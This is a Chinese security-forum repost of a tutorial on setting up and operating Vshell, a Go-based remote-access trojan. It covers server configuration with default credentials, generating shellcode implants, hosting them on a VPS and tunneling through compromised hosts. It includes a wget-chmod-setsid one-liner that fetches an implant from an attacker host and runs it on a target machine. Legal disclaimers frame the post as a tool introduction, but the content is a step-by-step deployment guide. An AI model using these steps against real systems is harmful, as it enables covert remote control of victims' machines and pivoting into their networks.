安全矩阵

 找回密码
 立即注册
搜索
查看: 986|回复: 0

工具 | Vshell使用入门

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-11-12 14:38:03 | 显示全部楼层 |阅读模式
云下避雨 云下信安 2023-08-04 20:50 发表于上海

写在前面
    "Vshell 是一款go编写的主机群管理工具(RAT)"。
    发现Vshell作者团队非常低调,项目Github上Readme介绍非常简短,网上也很少有使用介绍。写个基础入门,记录从配置到主机管理、搭建隧道。本文仅作为工具介绍,请勿用于任何违法场景。
    未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

目录
  1. 0x01 项目地址
  2. 0x02 启动前配置
  3. 0x03 启动管理端
  4. 0x04 客户端生成
  5. 0x05 新建隧道
复制代码


项目地址
  1. https://github.com/veo/vshell
复制代码
启动前配置
解压后进入conf目录,配置vshell.conf

设置客户端反连Vshell服务器端的端口和key
服务器Web端设置,设置端口、连接账号密码等
  1. 这里默认账号密码是
  2. web_username=admin
  3. web_password=qwe123qwe
复制代码


其他还有上线钉钉提醒等功能,暂时用不到不再展示。

启动管理端
  1. ./vshell_linux_amd64
复制代码




访问当前管理段IP的8082端口

里面的精神面貌大概是这样的,看目录基本能知道怎么使用。主要的命令控制台用于交互式命令行,文件管理用于上传下载文件。

客户端生成
生成linux或者windows shellcode马子


起一台VPS上传马子,开共享以便远程下载
  1. python -m http.server 8087
复制代码




生成后上传到需要上线机器,这里使用下载Http
  1. wget http://ip:8087/jvav && chmod 777 jvav && setsid ./jvav
复制代码




运行后服务器端发现已上线


新建隧道
点击客户端-隧道-新增
连接服务端的IP和设置的端口即可,这里socks5不能设置账号密码。点击新建隧道就穿出来了。


写在最后
    本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
    未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-8 08:47 , Processed in 0.014805 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表